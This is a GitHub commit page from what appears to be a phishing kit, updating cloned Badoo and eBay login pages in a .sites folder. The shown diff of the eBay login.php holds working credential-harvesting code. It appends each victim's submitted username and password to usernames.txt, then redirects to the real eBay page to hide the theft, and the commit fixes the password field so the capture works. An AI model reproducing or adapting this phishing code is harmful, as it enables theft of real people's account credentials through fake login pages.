Skip to content

Commit badabc5

Browse files
committed
Updated: Badoo,Ebay
1 parent e2b06e0 commit badabc5

File tree

7 files changed

+266
-780
lines changed

7 files changed

+266
-780
lines changed

.sites/badoo/favicon.ico

4.06 KB
Binary file not shown.

.sites/badoo/login.html

Lines changed: 173 additions & 304 deletions
Large diffs are not rendered by default.

.sites/badoo/logo.svg

Lines changed: 4 additions & 0 deletions
Loading

.sites/ebay/favicon.ico

1.12 KB
Binary file not shown.

.sites/ebay/login.html

Lines changed: 88 additions & 475 deletions
Large diffs are not rendered by default.

.sites/ebay/login.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
<?php
22

3-
file_put_contents("usernames.txt", "Ebay Username: " . $_POST['userid'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
3+
file_put_contents("usernames.txt", "Ebay Username: " . $_POST['userid'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
44
header('Location: https://accounts.ebay.com/acctxs/user');
55
exit();
66
?>

.sites/ebay/logo.png

4.71 KB
Loading

0 commit comments

Comments
 (0)